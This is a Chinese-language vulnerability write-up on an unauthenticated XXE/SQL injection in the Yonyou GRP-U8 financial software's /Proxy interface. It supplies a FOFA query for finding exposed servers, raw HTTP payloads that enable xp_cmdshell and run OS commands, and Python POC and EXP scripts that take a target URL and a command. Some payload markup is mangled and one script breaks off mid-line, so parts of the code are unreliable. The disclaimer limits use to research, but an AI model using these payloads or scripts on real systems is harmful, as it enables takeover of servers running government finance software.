用友 GRP-U8 Proxy XXE-SQL注入漏洞

---

声明

本篇文章仅限技术学习与安全研究，切勿将文中所涉及的攻击手段用于非授权下渗透行为，造成任何后果与本文和作者无关。

---

一、漏洞详情

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域最专业的政府财务管理软件。

二、漏洞描述

该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载，导致可加载恶意外部文件。最终产生两种后果，一是可以进行SQL注入，执行SQL语句；二是导致命令执行，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。

用友 GRP-U8 Proxy 接口存在 SQL 注入漏洞，攻击者通过漏洞可以获取服务器权限。

---

FOFA：title=“GRP-U8” 或 title=“用友 GRP-U8 行政事业内控管理软件”

---

三、利用条件

无需登录

四、漏洞POC

POST /Proxy HTTP/1.1
Accept: *
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
Content-Length: 349
Connection: close

//查询数据库版本(MSSQL),并回显
	cVer=9.8.0&dp=<
	DATAFORMAT>XML AS_DataRequest
 ProviderNameDataSetProviderData
	 Dataselect @@version<
	/PARAM> 

//查询当前数据库名称
	cVer=9.8.0&dp=<
	DATAFORMAT>XML AS_DataRequest
 ProviderNameDataSetProviderData
	 Dataselect db_name()<
	/PARAM> 

以POST方式发送如下几个Payload，开启 xp_cmdshell 操作，查询到当前数据库名称后，第一个包需要修改当前库名

cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequestProviderNameDataSetProviderDataDatause master

cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequestProviderNameDataSetProviderDataDataexec sp_configure 'show adv
anced options',1

cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequestProviderNameDataSetProviderDataDatareconfigure<
/PARAMS>

cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequestProviderNameDataSetProviderDataDataexec sp_configure 'xp_cmdsh
ell',1

cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequestProviderNameDataSetProviderDataDatareconfigure<
/PARAMS>


//执行dir命令
cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell "dir"

上面几个POC大概意思就是开启xp_cmdshell指令并刷新配置

USE master
EXEC sp_configure ‘show advanced options’,1 //启用xp_cmdshell的高级配置 RECONFIGURE --刷新配置
RECONFIGURE //先执行一次刷新，处理上次的配置
EXEC sp_configure ‘xp_cmdshell’,1 //打开xp_cmdshell,可以调用SQL系统 之外的命令
RECONFIGURE //刷新配置

五、利用脚本

GRP-U8_SQLinjection_POC

#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
    print "Usage: python poc.py url sql"
    sys.exit(1)
url = sys.argv[1]
sql = sys.argv[2]
headers = {
	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
	"Content-Type":"application/x-www-form-urlencoded",
}
def poc(url,sql):
	url = url + '/Proxy'
	print url
	data = 'cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataData'+sql+''
	res = requests.post(url,headers=headers,data=data)
	res = res.text
	result_row = r'

GRP-U8_SQLinjection_EXP

#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
    print "Usage: python exp.py url cmd"
    sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
headers = {
	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
	"Content-Type":"application/x-www-form-urlencoded",
}
def exp(url,cmd):
	url = url+ '/Proxy'
	print url
	data = 'cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell \''+cmd+'\''
	res = requests.post(url,headers=headers,data=data)
	res = res.text
	result_row = r''
	ROW = re.findall(result_row,res,re.S | re.M)
	print '命令执行成功！'
	for i in range(len(ROW)):
		print ROW[i]
if __name__ == "__main__":
    exp(sys.argv[1],sys.argv[2])

六、漏洞代码分析

可参考文章：https://baijiahao.baidu.com/s?id=1681131145841849209&wfr=spider&for=pc